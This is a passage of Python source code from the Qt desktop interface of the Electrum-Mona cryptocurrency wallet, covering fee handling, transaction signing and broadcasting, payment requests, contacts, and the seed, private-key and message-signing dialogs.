fallback to actual fee if nothing is frozen displayed_fee = fee self.fee_e.setAmount(displayed_fee) displayed_fee = displayed_fee if displayed_fee else 0 displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None self.feerate_e.setAmount(displayed_feerate) # show/hide fee rounding icon feerounding = (fee - displayed_fee) if fee else 0 self.set_feerounding_text(int(feerounding)) self.feerounding_icon.setToolTip(self.feerounding_text) self.feerounding_icon.setVisible(abs(feerounding) >= 1) if self.max_button.isChecked(): amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) def from_list_delete(self, item): i = self.from_list.indexOfTopLevelItem(item) self.pay_from.pop(i) self.redraw_from_list() self.update_fee() def from_list_menu(self, position): item = self.from_list.itemAt(position) menu = QMenu() menu.addAction(_("Remove"), lambda: self.from_list_delete(item)) menu.exec_(self.from_list.viewport().mapToGlobal(position)) def set_pay_from(self, coins): self.pay_from = list(coins) self.redraw_from_list() def redraw_from_list(self): self.from_list.clear() self.from_label.setHidden(len(self.pay_from) == 0) self.from_list.setHidden(len(self.pay_from) == 0) def format(x): h = x.get('prevout_hash') return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address') for item in self.pay_from: self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password @protected def protect(self, func, args, password): return func(*args, password) def is_send_fee_frozen(self): return self.fee_e.isVisible() and self.fee_e.isModified() \ and (self.fee_e.text() or self.fee_e.hasFocus()) def is_send_feerate_frozen(self): return self.feerate_e.isVisible() and self.feerate_e.isModified() \ and (self.feerate_e.text() or self.feerate_e.hasFocus()) def get_send_fee_estimator(self): if self.is_send_fee_frozen(): fee_estimator = self.fee_e.get_amount() elif self.is_send_feerate_frozen(): amount = self.feerate_e.get_amount() # sat/byte feerate amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate fee_estimator = partial( simple_config.SimpleConfig.estimate_fee_for_feerate, amount) else: fee_estimator = None return fee_estimator def read_outputs(self): if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) return outputs def check_send_tab_outputs_and_show_errors(self, outputs) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.address is None: self.show_error(_('Bitcoin Address is None')) return True if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address): self.show_error(_('Invalid Bitcoin Address')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def pay_lightning_invoice(self, invoice): amount_sat = self.amount_e.get_amount() attempts = LN_NUM_PAYMENT_ATTEMPTS def task(): self.wallet.lnworker.pay(invoice, amount_sat, attempts) self.do_clear() self.wallet.thread.add(task) self.invoice_list.update() def on_payment_status(self, key, status, *args): # todo: check that key is in this wallet's invoice list self.invoice_list.update() if status == 'success': self.show_message(_('Payment succeeded')) self.need_update.set() elif status == 'progress': print('on_payment_status', key, status, args) elif status == 'failure': self.show_info(_('Payment failed')) elif status == 'error': e = args[0] self.show_error(_('Error') + '\n' + str(e)) def read_invoice(self): message = self.message_e.text() amount = self.amount_e.get_amount() if not self.is_onchain: return { 'type': PR_TYPE_LN, 'invoice': self.payto_e.lightning_invoice, 'amount': amount, 'message': message, } else: outputs = self.read_outputs() if self.check_send_tab_outputs_and_show_errors(outputs): return return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI) def do_save_invoice(self): invoice = self.read_invoice() if not invoice: return self.wallet.save_invoice(invoice) self.do_clear() self.invoice_list.update() def do_preview(self): self.do_pay(preview=True) def do_pay(self, preview=False): invoice = self.read_invoice() if not invoice: return if not preview: self.wallet.save_invoice(invoice) self.do_clear() self.invoice_list.update() self.do_pay_invoice(invoice, preview) def do_pay_invoice(self, invoice, preview=False): if invoice['type'] == PR_TYPE_LN: self.pay_lightning_invoice(self.payto_e.lightning_invoice) return elif invoice['type'] == PR_TYPE_ONCHAIN: message = invoice['message'] outputs = invoice['outputs'] else: raise Exception('unknown invoice type') if run_hook('abort_send', self): return outputs = [TxOutput(*x) for x in outputs] fee_estimator = self.get_send_fee_estimator() coins = self.get_coins() try: is_sweep = bool(self.tx_external_keypairs) tx = self.wallet.make_unsigned_transaction( coins, outputs, fixed_fee=fee_estimator, is_sweep=is_sweep) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: self.show_message(str(e)) return except InternalAddressCorruption as e: self.show_error(str(e)) raise except BaseException as e: self.logger.exception('') self.show_message(str(e)) return amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x: x.value, outputs)) fee = tx.get_fee() #use_rbf = bool(self.config.get('use_rbf', True)) #if use_rbf: # tx.set_rbf(True) if fee < self.wallet.relayfee() * tx.estimated_size() / 1000: self.show_error('\n'.join([ _("This transaction requires a higher fee, or it will not be propagated by your current server"), _("Try to raise your transaction fee, or use a server with a lower relay fee.") ])) return if preview: self.show_transaction(tx, message) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) return # confirmation dialog msg = [ _("Amount to be sent") + ": " + self.format_amount_and_units(amount), _("Mining fee") + ": " + self.format_amount_and_units(fee), ] x_fee = run_hook('get_tx_extra_fee', self.wallet, tx) if x_fee: x_fee_address, x_fee_amount = x_fee msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) ) feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE if fee > feerate_warning * tx.estimated_size() / 1000: msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high.")) if self.wallet.has_keystore_encryption(): msg.append("") msg.append(_("Enter your password to proceed")) password = self.password_dialog('\n'.join(msg)) if not password: return else: msg.append(_('Proceed?')) password = None if not self.question('\n'.join(msg)): return def sign_done(success): if success: if not tx.is_complete(): self.show_transaction(tx) self.do_clear() else: self.broadcast_transaction(tx, message) self.sign_tx_with_password(tx, sign_done, password) @protected def sign_tx(self, tx, callback, password): self.sign_tx_with_password(tx, callback, password) def sign_tx_with_password(self, tx, callback, password): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if self.tx_external_keypairs: # can sign directly task = partial(Transaction.sign, tx, self.tx_external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx, tx_desc): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Payment request has expired") status = False try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: msg = e.get_message_for_gui() except BestEffortRequestFailed as e: msg = repr(e) else: status, msg = True, tx.txid() if pr and status is True: key = pr.get_id() #self.wallet.set_invoice_paid(key, tx.txid()) self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}") return status, msg # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: status, msg = result if status: if tx_desc is not None and tx.is_complete(): self.wallet.set_label(tx.txid(), tx_desc) parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() self.do_clear() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) @protected def open_channel(self, *args, **kwargs): def task(): return self.wallet.lnworker.open_channel(*args, **kwargs) def on_success(chan): n = chan.constraints.funding_txn_minimum_depth message = '\n'.join([ _('Channel established.'), _('Remote peer ID') + ':' + chan.node_id.hex(), _('This channel will be usable after {} confirmations').format(n) ]) self.show_message(message) def on_failure(exc_info): type_, e, traceback = exc_info self.show_error(_('Could not open channel: {}').format(e)) WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b): self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoice(self, key): self.wallet.delete_invoice(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = pr.get_id() invoice = self.wallet.get_invoice(key) if invoice and invoice['status'] == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point)) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request): self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def parse_lightning_invoice(self, invoice): from electrum_mona.lnaddr import lndecode lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP) pubkey = bh2u(lnaddr.pubkey.serialize()) for k,v in lnaddr.tags: if k == 'd': description = v break else: description = '' self.payto_e.setFrozen(True) self.payto_e.setText(pubkey) self.message_e.setText(description) if lnaddr.amount is not None: self.amount_e.setAmount(lnaddr.amount * COIN) #self.amount_e.textEdited.emit("") self.set_onchain(False) def set_onchain(self, b): self.is_onchain = b self.preview_button.setEnabled(b) self.max_button.setEnabled(b) self.show_send_tab_onchain_fees(b) def show_send_tab_onchain_fees(self, b: bool): self.feecontrol_fields.setVisible(b) self.fee_e_label.setVisible(b) def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() self.payto_URI = out r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.not_enough_funds = False self.payment_request = None self.payto_URI = None self.payto_e.is_pr = False self.is_onchain = False self.set_onchain(False) for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.feerate_e]: e.setText('') e.setFrozen(False) self.fee_slider.activate() self.feerate_e.setAmount(self.config.fee_per_byte()) self.size_e.setAmount(0) self.feerounding_icon.setVisible(False) self.set_pay_from([]) self.tx_external_keypairs = {} self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() self.update_fee() def set_frozen_state_of_coins(self, utxos, freeze: bool): self.wallet.set_frozen_state_of_coins(utxos, freeze) self.utxo_list.update() self.update_fee() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) #vbox.setContentsMargins(0, 0, 0, 0) #vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_addresses', False)) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = l = UTXOList(self) return self.create_list_tab(l) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if self.question(_("Do you want to remove {} from your wallet?").format(addr)): self.wallet.delete_address(addr) self.need_update.set() # history, addresses, coins self.clear_receive_tab() def get_coins(self): if self.pay_from: return self.pay_from else: return self.wallet.get_spendable_coins(None) def spend_coins(self, coins): self.set_pay_from(coins) self.set_onchain(len(coins) > 0) self.show_send_tab() self.update_fee() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_invoice(self, key): invoice = self.wallet.get_invoice(key) if invoice is None: self.show_error('Cannot find payment request in wallet.') return bip70 = invoice.get('bip70') if bip70: pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70)) pr.verify(self.contacts) self.show_bip70_details(pr) def show_bip70_details(self, pr): key = pr.get_id() d = WindowModalDialog(self, _("BIP70 Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0) grid.addWidget(QLabel(pr.get_requestor()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs())) grid.addWidget(QLabel(outputs_str), 1, 1) expires = pr.get_expiration_date() grid.addWidget(QLabel(_("Memo") + ':'), 2, 0) grid.addWidget(QLabel(pr.get_memo()), 2, 1) grid.addWidget(QLabel(_("Signature") + ':'), 3, 0) grid.addWidget(QLabel(pr.get_verify_status()), 3, 1) if expires: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(expires)), 4, 1) vbox.addLayout(grid) def do_export(): name = str(key) + '.bip70' fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70") if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('Invoice saved as' + ' ' + fn)) exportButton = EnterButton(_('Save'), do_export) def do_delete(): if self.question(_('Delete invoice?')): self.wallet.delete_invoices(key) self.history_list.update() self.invoice_list.update() d.close() deleteButton = EnterButton(_('Delete'), do_delete) vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d))) d.exec_() def pay_bip70_invoice(self, key): pr = self.wallet.get_invoice(key) self.payment_request = pr self.prepare_for_payment_request() pr.error = None # this forces verify() to re-run if pr.verify(self.contacts): self.payment_request_ok() else: self.payment_request_error() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.wallet.storage.get("qt-console-history", []) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum_mona, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, }) c = commands.Commands(config=self.config, network=self.network, callback=lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args, **kwargs: f(method, args, self.password_dialog, **{**kwargs, 'wallet': self.wallet}) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self)) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) self.send_button.setVisible(not self.wallet.is_watching_only()) def change_password_dialog(self): from electrum_mona.storage import StorageEncryptionVersion if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(repr(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): tab = self.tabs.currentWidget() #if hasattr(tab, 'searchable_list'): # tab.searchable_list.toggle_toolbar() #return self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(32 * char_width_in_lineedit()) line2 = QLineEdit() line2.setFixedWidth(32 * char_width_in_lineedit()) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_master_public_keys(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) mpk_list = self.wallet.get_master_public_keys() vbox = QVBoxLayout() wallet_type = self.wallet.storage.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) vbox.addLayout(grid) if self.wallet.is_deterministic(): mpk_text = ShowQRTextEdit() mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) def show_mpk(index): mpk_text.setText(mpk_list[index]) mpk_text.repaint() # macOS hack for #4777 # only show the combobox in case multiple accounts are available if len(mpk_list) > 1: # only show the combobox if multiple master keys are defined def label(idx, ks): if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'): return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}' else: return _("keystore") + f' {idx+1}' labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())] on_click = lambda clayout: show_mpk(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click) vbox.addLayout(labels_clayout.layout()) else: vbox.addWidget(QLabel(_("Master Public Key"))) show_mpk(0) vbox.addWidget(mpk_text) vbox.addStretch(1) btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog)) vbox.addLayout(btns) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(repr(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None): if not data: return d = QRDialog(data, parent or self, title) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk, redeem_script = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(repr(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) if redeem_script: vbox.addWidget(QLabel(_("Redeem Script") + ':')) rds_e = ShowQRTextEdit(text=redeem_script) rds_e.addCopyButton(self.app) vbox.addWidget(rds_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, txt) -> Optional[Transaction]: from electrum_mona.transaction import tx_from_str try: tx = tx_from_str(txt) return Transaction(tx) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e)) return def read_tx_from_qrcode(self): from electrum_mona import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: self.show_error(repr(e)) return if not data: return # if the user scanned a bitcoin URI if str(data).startswith("monacoin:"): self.pay_to_URI(data) return # else if the user scanned an offline signed tx try: data = bh2u(bitcoin.base_decode(data, length=None, base=43)) except BaseException as e: self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e))) return tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self) -> Optional[Transaction]: fileName = 